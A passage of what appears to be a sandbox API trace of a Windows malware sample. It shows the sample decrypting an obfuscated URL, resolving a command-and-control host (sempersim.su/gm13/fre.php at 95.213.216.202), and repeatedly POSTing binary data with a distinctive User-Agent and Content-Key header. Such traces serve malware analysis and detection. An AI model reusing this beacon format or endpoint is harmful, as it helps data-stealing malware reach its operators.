application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0113.833] GetProcessHeap () returned 0x620000 [0113.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0113.833] GetProcessHeap () returned 0x620000 [0113.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0113.833] send (s=0x2a8, buf=0x636340*, len=237, flags=0) returned 237 [0113.835] send (s=0x2a8, buf=0x6421e0*, len=159, flags=0) returned 159 [0113.835] GetProcessHeap () returned 0x620000 [0113.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0113.836] recv (in: s=0x2a8, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0115.683] GetProcessHeap () returned 0x620000 [0115.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0115.683] GetProcessHeap () returned 0x620000 [0115.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0115.684] GetProcessHeap () returned 0x620000 [0115.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0115.684] GetProcessHeap () returned 0x620000 [0115.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0115.684] closesocket (s=0x2a8) returned 0 [0115.685] GetProcessHeap () returned 0x620000 [0115.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0115.685] GetProcessHeap () returned 0x620000 [0115.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0115.685] GetProcessHeap () returned 0x620000 [0115.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0115.686] GetProcessHeap () returned 0x620000 [0115.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0115.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1240) returned 0x2a8 [0115.688] Sleep (dwMilliseconds=0xea60) [0115.698] GetProcessHeap () returned 0x620000 [0115.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0115.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0115.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0115.797] GetProcessHeap () returned 0x620000 [0115.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0115.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.798] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0115.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.799] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0115.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.800] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0115.800] GetProcessHeap () returned 0x620000 [0115.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0115.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.801] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0115.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.802] CryptDestroyKey (hKey=0x62d710) returned 1 [0115.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.803] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0115.803] GetProcessHeap () returned 0x620000 [0115.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0115.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.804] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0115.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.805] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0115.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.806] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0115.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.857] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0115.857] GetProcessHeap () returned 0x620000 [0115.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0115.857] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0115.857] GetProcessHeap () returned 0x620000 [0115.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0115.858] GetProcessHeap () returned 0x620000 [0115.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0115.858] GetProcessHeap () returned 0x620000 [0115.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0115.858] GetProcessHeap () returned 0x620000 [0115.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0115.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0115.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0115.877] GetProcessHeap () returned 0x620000 [0115.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0115.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.878] CryptImportKey (in: hProv=0x63ba90, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0115.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.878] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0115.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.879] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0115.879] GetProcessHeap () returned 0x620000 [0115.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0115.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.880] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0115.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.881] CryptDestroyKey (hKey=0x62d710) returned 1 [0115.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0115.882] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0115.882] GetProcessHeap () returned 0x620000 [0115.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0115.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.883] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0115.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.884] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0115.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.885] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0115.885] GetProcessHeap () returned 0x620000 [0115.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0115.885] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0115.920] GetProcessHeap () returned 0x620000 [0115.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0115.920] socket (af=2, type=1, protocol=6) returned 0x2ac [0115.920] connect (s=0x2ac, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0115.969] FreeAddrInfoW (pAddrInfo=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0115.969] GetProcessHeap () returned 0x620000 [0115.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0115.969] GetProcessHeap () returned 0x620000 [0115.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0115.970] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0115.970] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0115.970] GetProcessHeap () returned 0x620000 [0115.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0115.971] GetProcessHeap () returned 0x620000 [0115.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0115.971] GetProcessHeap () returned 0x620000 [0115.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f30 [0115.971] GetProcessHeap () returned 0x620000 [0115.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0115.972] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0115.973] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0115.973] GetProcessHeap () returned 0x620000 [0115.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0115.973] GetProcessHeap () returned 0x620000 [0115.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0115.974] send (s=0x2ac, buf=0x636340*, len=237, flags=0) returned 237 [0115.976] send (s=0x2ac, buf=0x6421e0*, len=159, flags=0) returned 159 [0115.976] GetProcessHeap () returned 0x620000 [0115.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0115.976] recv (in: s=0x2ac, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0117.717] GetProcessHeap () returned 0x620000 [0117.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0117.718] GetProcessHeap () returned 0x620000 [0117.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0117.718] GetProcessHeap () returned 0x620000 [0117.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0117.719] GetProcessHeap () returned 0x620000 [0117.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0117.719] closesocket (s=0x2ac) returned 0 [0117.721] GetProcessHeap () returned 0x620000 [0117.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0117.721] GetProcessHeap () returned 0x620000 [0117.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0117.721] GetProcessHeap () returned 0x620000 [0117.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0117.722] GetProcessHeap () returned 0x620000 [0117.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0117.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x125c) returned 0x2ac [0117.726] Sleep (dwMilliseconds=0xea60) [0117.733] GetProcessHeap () returned 0x620000 [0117.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0117.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0117.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.771] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0117.789] GetProcessHeap () returned 0x620000 [0117.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0117.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.790] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0117.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.791] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0117.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.792] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0117.792] GetProcessHeap () returned 0x620000 [0117.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0117.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.795] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0117.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.796] CryptDestroyKey (hKey=0x62d190) returned 1 [0117.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.797] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0117.797] GetProcessHeap () returned 0x620000 [0117.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0117.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.798] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0117.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.798] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0117.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.799] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0117.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.800] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0117.800] GetProcessHeap () returned 0x620000 [0117.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0117.800] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0117.800] GetProcessHeap () returned 0x620000 [0117.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0117.801] GetProcessHeap () returned 0x620000 [0117.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0117.801] GetProcessHeap () returned 0x620000 [0117.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0117.801] GetProcessHeap () returned 0x620000 [0117.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0117.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.802] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0117.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.807] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0117.829] GetProcessHeap () returned 0x620000 [0117.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0117.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.830] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0117.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.831] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0117.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.832] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0117.832] GetProcessHeap () returned 0x620000 [0117.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0117.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.833] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0117.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.834] CryptDestroyKey (hKey=0x62d710) returned 1 [0117.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0117.835] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0117.835] GetProcessHeap () returned 0x620000 [0117.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0117.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.836] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0117.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.837] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0117.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.838] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0117.838] GetProcessHeap () returned 0x620000 [0117.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0117.838] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c208*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0117.842] GetProcessHeap () returned 0x620000 [0117.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0117.842] socket (af=2, type=1, protocol=6) returned 0x2b0 [0117.842] connect (s=0x2b0, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0117.897] FreeAddrInfoW (pAddrInfo=0x63c208*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0117.897] GetProcessHeap () returned 0x620000 [0117.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0117.897] GetProcessHeap () returned 0x620000 [0117.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0117.899] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0117.900] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0117.900] GetProcessHeap () returned 0x620000 [0117.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0117.900] GetProcessHeap () returned 0x620000 [0117.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0117.901] GetProcessHeap () returned 0x620000 [0117.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643368 [0117.901] GetProcessHeap () returned 0x620000 [0117.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0117.902] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0117.902] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0117.902] GetProcessHeap () returned 0x620000 [0117.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0117.902] GetProcessHeap () returned 0x620000 [0117.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0117.903] send (s=0x2b0, buf=0x636340*, len=237, flags=0) returned 237 [0117.903] send (s=0x2b0, buf=0x6421e0*, len=159, flags=0) returned 159 [0117.904] GetProcessHeap () returned 0x620000 [0117.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0117.904] recv (in: s=0x2b0, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0119.682] GetProcessHeap () returned 0x620000 [0119.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0119.683] GetProcessHeap () returned 0x620000 [0119.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0119.683] GetProcessHeap () returned 0x620000 [0119.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0119.684] GetProcessHeap () returned 0x620000 [0119.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0119.684] closesocket (s=0x2b0) returned 0 [0119.685] GetProcessHeap () returned 0x620000 [0119.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0119.685] GetProcessHeap () returned 0x620000 [0119.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: 